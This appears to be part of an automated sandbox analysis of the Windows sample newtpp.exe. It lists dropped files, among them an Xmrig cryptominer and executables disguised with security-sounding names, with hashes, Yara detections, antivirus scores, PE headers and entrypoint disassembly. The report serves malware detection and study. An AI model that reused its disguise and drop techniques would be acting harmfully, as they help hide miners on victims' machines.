                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jqk4ju1w.bm3.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jsdob0tz.uef.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mb2xfjbs.lzy.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ouovf3b0.53b.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pb0fbvvj.uov.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rn1kkdnr.idy.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sbyzdgct.jpt.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqpnl5bk.tsj.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_voa3jt45.oac.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wn2qn4il.cfy.ps1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x0n0kdv0.ydd.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ymk2d1o5.sg4.psm1

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):60
                                                                                                                  Entropy (8bit):4.038920595031593
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                  Malicious:false
                                                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                  C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5536256
                                                                                                                  Entropy (8bit):6.689058470432344
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                                  MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                                  SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                                  SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                                  SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                                  Malicious:true
                                                                                                                  Yara Hits:
                                                                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security
                                                                                                                  • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown
                                                                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth
                                                                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                  Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

                                                                                                                  C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                  File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):14544
                                                                                                                  Entropy (8bit):6.2660301556221185
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                  MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                  SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                  SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                  SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\1088610392.exe
                                                                                                                  File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5827584
                                                                                                                  Entropy (8bit):7.718261688436852
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                  MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                  SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                  SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                  SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 76%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f...............&......X................@.............................pY.......Y...`... .............................................. Y.4....PY.......X.X............`Y.0.............................X.(...................."Y.P............................text...P...........................`..`.data.....V.......V.................@....rdata...9....X..:...xX.............@..@.pdata..X.....X.......X.............@..@.xdata........X.......X.............@..@.bss..........Y..........................idata..4.... Y.......X.............@....CRT....`....0Y.......X.............@....tls.........@Y.......X.............@....rsrc........PY.......X.............@....reloc..0....`Y.......X.............@..B........................................................................................................................................................................

                                                                                                                  C:\Users\user\tbtnds.dat

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\sysnldcvmr.exe
                                                                                                                  File Type:data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):4080
                                                                                                                  Entropy (8bit):4.776282372092237
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:V9lxpje1/XGuiCk3jc5LdxJvxLWNpvoS7Noz2xGMl/Ug4sd8n:9eWCkTc5xkJRoni4Pn
                                                                                                                  MD5:E1C03C3B3D89CE0980AD536A43035195
                                                                                                                  SHA1:34372B2BFE251EE880857D50C40378DC19DB57A7
                                                                                                                  SHA-256:D2F3A053063B8BB6F66CEE3E222B610321FA4E1611FC2FAF6129C64D504D7415
                                                                                                                  SHA-512:6EA0233DF4A093655387DAE11E935FB410E704E742DBCF085C403630E6B034671C5235AF15C21DFBB614E2A409D412A74A0B4EF7386D0ABFFFA1990D0F611C70
                                                                                                                  Malicious:false
                                                                                                                  Preview:.................TQ....Y,......f.a......8.R.......R.....q.M...._;.......py;....-..*......|....../.'....m.o.....M........Y.......r......^.D8......g.....\|.........V.....#......../.......%......6......~}....Y........L........9G......I....{......................#@......{E/....................^..8....f.P....M,.%....[]........e8.......]..............c......._.....Z..*....f..T....f.......Z..R......l......l\......A:..............~.....%x.........1.....e......Y.......M.w....u.......R.xJ....-.h.......cw......................pR......[W............y.V...._;.......z......_9......U.......^.Ez.....[/=....&......_.W.....]..(....R..A...._:....................................Z..{.......E.....6......|m0.............Z..S....[z.v.....Qf............m......Z..H.......$......f.......'....Z..}....................pB......a......F5.....................{.....].V.....V>.C......,#....Z..$.....y~W....N&................r....N%.......#P.......".......=.......Z......z.............Z..e....^.,G....

                                                                                                                  C:\Windows\sysnldcvmr.exe

                                                                                                                  Download File
                                                                                                                  Process:C:\Users\user\Desktop\newtpp.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):80896
                                                                                                                  Entropy (8bit):6.424014659383267
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                                                                  MD5:0C883B1D66AFCE606D9830F48D69D74B
                                                                                                                  SHA1:FE431FE73A4749722496F19B3B3CA0B629B50131
                                                                                                                  SHA-256:D921FC993574C8BE76553BCF4296D2851E48EE39B958205E69BDFD7CF661D2B1
                                                                                                                  SHA-512:C047452A23EFAD4262479FBFEB5E23F9497D7CEFD4CBB58E869801206669C2A0759698C70D18050316798D5D939B989537FDCE3842AA742449F5E08ED7FA60A5
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 82%
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9........................PE..L.....3g.....................d.......u............@..........................p...............................................$.......................................................................................................................text............................... ..`.rdata...3.......4..................@..@.data...(/...@... ..................@...................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Entropy (8bit):6.424014659383267
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:newtpp.exe
                                                                                                                  File size:80'896 bytes
                                                                                                                  MD5:0c883b1d66afce606d9830f48d69d74b
                                                                                                                  SHA1:fe431fe73a4749722496f19b3b3ca0b629b50131
                                                                                                                  SHA256:d921fc993574c8be76553bcf4296d2851e48ee39b958205e69bdfd7cf661d2b1
                                                                                                                  SHA512:c047452a23efad4262479fbfeb5e23f9497d7cefd4cbb58e869801206669c2a0759698c70d18050316798d5d939b989537fdce3842aa742449f5e08ed7fa60a5
                                                                                                                  SSDEEP:1536:ZwjmKHFmav82kFifdWXwCsgTT+vr3Rzmxwz6fYc6on:+6tOMFif3CsKavr0xwz6gc6on
                                                                                                                  TLSH:84833A00F5D0913BF8F681FAD2FB5669182CEFB4130954E3529079AF9B246E9BD71027
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m.pj)..9)..9)..9 ..9...9Q..8+..9..C9+..9..A9(..9...9+..9..s9-..9)..9...9..e9<..9 ..9-..9 ..95..9 ..9(..9Rich)..9...............

                                                                                                                  File Icon

                                                                                                                  Icon Hash:90cececece8e8eb0

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x407590
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:false
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x6733D6CD [Tue Nov 12 22:29:33 2024 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:1f7961bcbceb0a81d173bd7219d6ad2b

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  push ebp
                                                                                                                  mov ebp, esp
                                                                                                                  sub esp, 00000FF0h
                                                                                                                  push 00000BB8h
                                                                                                                  call dword ptr [00410138h]
                                                                                                                  push 00414318h
                                                                                                                  push 00000000h
                                                                                                                  push 00000000h
                                                                                                                  call dword ptr [0041008Ch]
                                                                                                                  mov dword ptr [ebp-00000E5Ch], eax
                                                                                                                  call dword ptr [00410090h]
                                                                                                                  cmp eax, 000000B7h
                                                                                                                  jne 00007F659CCF40DAh
                                                                                                                  push 00000000h
                                                                                                                  call dword ptr [00410094h]
                                                                                                                  mov dword ptr [ebp-0000062Ch], 00000000h
                                                                                                                  mov dword ptr [ebp-0000041Ch], 00000000h
                                                                                                                  mov dword ptr [ebp-0000083Ch], 00000001h
                                                                                                                  mov dword ptr [ebp-00000210h], 00000004h
                                                                                                                  push 00000105h
                                                                                                                  push 00416268h
                                                                                                                  push 00000000h
                                                                                                                  call dword ptr [004100A4h]
                                                                                                                  push 00416268h
                                                                                                                  call dword ptr [00410170h]
                                                                                                                  mov dword ptr [ebp-0000020Ch], eax
                                                                                                                  push 00416268h
                                                                                                                  push 0041140Ch
                                                                                                                  lea eax, dword ptr [ebp-00000208h]
                                                                                                                  push eax
                                                                                                                  call dword ptr [00410190h]
                                                                                                                  add esp, 0Ch
                                                                                                                  lea ecx, dword ptr [ebp-00000208h]
                                                                                                                  push ecx
                                                                                                                  call dword ptr [004100B4h]
                                                                                                                  push 00000104h
                                                                                                                  lea edx, dword ptr [ebp-00000E58h]
                                                                                                                  push edx
                                                                                                                  push 00411434h
                                                                                                                  call dword ptr [00410098h]

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2005 build 50727
                                                                                                                  • [IMP] VS2005 build 50727
                                                                                                                  • [ C ] VS2008 SP1 build 30729
                                                                                                                  • [C++] VS2008 SP1 build 30729
                                                                                                                  • [LNK] VS2008 SP1 build 30729

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x124840x104.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x100000x310.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000xe2f20xe4005777de2686d4abcd72e25c2acbcb6bcdFalse0.4721080043859649data6.118878815733053IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x100000x33fa0x3400ad04d32232e6b5c20b389718383e1afeFalse0.4922626201923077data5.702257601801553IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0x140000x2f280x2000638b8e3ccb3940699397cdf5e3284443False0.351806640625data5.382323554040506IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                                                                                                  Imports

                                                                                                                  DLLImport
